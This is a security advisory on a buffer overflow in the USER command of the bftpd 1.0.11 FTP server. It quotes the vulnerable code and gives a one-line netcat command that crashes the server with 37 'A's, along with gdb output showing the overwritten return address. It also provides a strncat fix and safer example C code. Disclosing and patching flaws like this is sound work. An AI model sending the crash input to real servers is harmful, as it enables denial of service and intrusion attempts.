COMMAND

    bftpd

SYSTEMS AFFECTED

    bftpd-1.0.11

PROBLEM

    Christophe Bailleus found the following.  bftpd is a Linux FTP server
    with chroot and setreuid support.  Not all FTP commands are implemented.
    It serves either the user's home directory or its ftp subdirectory,
    and user authentication is via passwd/shadow or PAM.

    The latest version of bftpd has a security problem in its handling of
    the USER command: a buffer overflow occurs when more than 35 characters
    are supplied as the username.

    a) Code problem (bftpd-1.0.11/commands.c):

        102  void command_user(char *username) {
        103    char *alias;
        104    char name[USERLEN + 7] = "ALIAS_";
        105    if(state) {
        106      fprintf(stderr, "503 Username already given.\r\n");
        107      return;
        108    }
        109    alias = (char *) config_getoption(strcat(name, username));
        110    if(alias[0] != '\0')

    b) Demo / gdb output

        tshaw:~$ printf "user `perl -e 'print"A"x37'`\n" | nc localhost 21
        
        
        tshaw:/home/cb/bftpd-1.0.11# gdb /usr/sbin/bftpd 6613
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain
        conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for
        details.
        This GDB was configured as "i386-slackware-linux"...
        (no debugging symbols found)...
        Attaching to program: /usr/sbin/bftpd, Pid 6624
        Reading symbols from /lib/libcrypt.so.1...done.
        Loaded symbols for /lib/libcrypt.so.1
        Reading symbols from /lib/libc.so.6...done.
        Loaded symbols for /lib/libc.so.6
        Reading symbols from /lib/ld-linux.so.2...done.
        Loaded symbols for /lib/ld-linux.so.2
        0x400e7514 in read () from /lib/libc.so.6
        (gdb) c
        Continuing.
        
        Program received signal SIGSEGV, Segmentation fault.
        0x41414141 in ?? ()
        (gdb)
        (gdb) x $esp
        0xbffffcb8:     0x41414141
        (gdb)

    It is not possible to exploit this with a standard exploit:
    commands.c contains a piece of code that strips non-printable
    characters (bytes below 32) from the command line, e.g. NOPs or
    shellcode bytes.

        469    for(i = 0; i < strlen(str); i++) { /* Remove Internet Explorer garbage  */
        470      if(str[i] < 32) {
        471        memmove((char *) ((int) str + i),
        472                (char *) ((int) str + i + 1),
        473                strlen(str) - i);
        474        i--; /* If junk is found, don't increment counter in next loop. */
        475      }
        476    }

SOLUTION

    In bftpd-1.0.11/commands.c, replace line 109

        alias = (char *) config_getoption(strcat(name, username));

    with

        alias = (char *) config_getoption(strncat(name, username, USERLEN));
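    The following is an added example, not bftpd's code: it shows why the
    strncat() bound fits name[USERLEN + 7] exactly (6 prefix bytes + USERLEN
    + NUL), and contrasts it with a stricter variant that rejects an over-long
    username instead of silently truncating it.  USERLEN is assumed to be 32
    here; bftpd defines the real value in its own headers.

```c
#include <stdio.h>
#include <string.h>

#define USERLEN 32   /* assumed; bftpd defines the real value in its headers */

/* Patched bftpd behaviour: strncat() appends at most USERLEN bytes plus a NUL,
 * so "ALIAS_" (6) + USERLEN + 1 fits exactly in name[USERLEN + 7]. */
static void build_alias_key_truncating(char name[USERLEN + 7], const char *username)
{
    strcpy(name, "ALIAS_");
    strncat(name, username, USERLEN);
}

/* Stricter alternative (not bftpd's code): reject an over-long username
 * instead of silently truncating it to a different, shorter name. */
static int build_alias_key_checked(char *name, size_t namesz, const char *username)
{
    static const char prefix[] = "ALIAS_";
    size_t ulen = strlen(username);

    if (ulen > USERLEN || sizeof(prefix) + ulen > namesz)
        return -1;
    memcpy(name, prefix, sizeof(prefix) - 1);
    memcpy(name + sizeof(prefix) - 1, username, ulen + 1); /* copies the NUL */
    return 0;
}

/* Helpers: build a username of n 'A's (constructed input, like the
 * advisory's 37 x "A") and report what each builder does with it. */
static size_t key_len_after_truncation(size_t n)
{
    char user[128], name[USERLEN + 7];
    if (n >= sizeof user) n = sizeof user - 1;
    memset(user, 'A', n); user[n] = '\0';
    build_alias_key_truncating(name, user);
    return strlen(name);                 /* never exceeds USERLEN + 6 */
}

static int checked_accepts(size_t n)
{
    char user[128], name[USERLEN + 7];
    if (n >= sizeof user) n = sizeof user - 1;
    memset(user, 'A', n); user[n] = '\0';
    return build_alias_key_checked(name, sizeof name, user);
}

int main(void)
{
    printf("37 x 'A' -> truncated key length %zu, checked builder returns %d\n",
           key_len_after_truncation(37), checked_accepts(37));
    return 0;
}
```

    Note that the upstream strncat() fix truncates a 37-byte username to 32
    bytes and looks that shorter name up; the checked variant fails closed.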

    The bftpd team has been informed.